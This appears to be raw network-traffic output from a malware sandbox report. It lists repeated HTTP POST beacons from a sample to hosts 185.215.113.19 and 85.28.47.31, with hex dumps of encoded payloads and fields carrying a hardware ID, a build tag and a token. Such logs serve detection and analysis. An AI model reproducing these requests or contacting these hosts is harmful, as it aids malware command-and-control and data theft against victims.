Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECBAFCAAKJDHJKFIEBGHost: 85.28.47.31Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 33 30 31 30 66 66 31 62 34 63 64 65 36 34 63 30 66 36 35 34 32 33 38 31 65 61 36 39 65 61 38 33 61 36 33 35 65 63 39 37 36 65 66 61 36 66 62 39 66 39 34 34 38 66 37 66 35 35 65 39 37 38 35 34 30 63 39 32 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 2d 2d 0d 0a Data Ascii: ------IECBAFCAAKJDHJKFIEBGContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------IECBAFCAAKJDHJKFIEBGContent-Disposition: form-data; name="message"files------IECBAFCAAKJDHJKFIEBG--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIJKEBFBFHIJJKEHDHIHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 4a 4b 45 42 46 42 46 48 49 4a 4a 4b 45 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 33 30 31 30 66 66 31 62 34 63 64 65 36 34 63 30 66 36 35 34 32 33 38 31 65 61 36 39 65 61 38 33 61 36 33 35 65 63 39 37 36 65 66 61 36 66 62 39 66 39 34 34 38 66 37 66 35 35 65 39 37 38 35 34 30 63 39 32 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 4b 45 42 46 42 46 48 49 4a 4a 4b 45 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 4b 45 42 46 42 46 48 49 4a 4a 4b 45 48 44 48 49 2d 2d 0d 0a Data Ascii: ------BFIJKEBFBFHIJJKEHDHIContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------BFIJKEBFBFHIJJKEHDHIContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BFIJKEBFBFHIJJKEHDHI--
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHIIJDGHCBFIECBKEGHHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 39 37 46 39 41 35 35 33 43 36 32 35 30 37 32 38 36 39 35 38 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 48 2d 2d 0d 0a Data Ascii: ------BGHIIJDGHCBFIECBKEGHContent-Disposition: form-data; name="hwid"5897F9A553C62507286958------BGHIIJDGHCBFIECBKEGHContent-Disposition: form-data; name="build"sila------BGHIIJDGHCBFIECBKEGH--
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKFIJDHJEGIDHJKKKJJHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 39 37 46 39 41 35 35 33 43 36 32 35 30 37 32 38 36 39 35 38 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="hwid"5897F9A553C62507286958------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="build"sila------CAKFIJDHJEGIDHJKKKJJ--
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
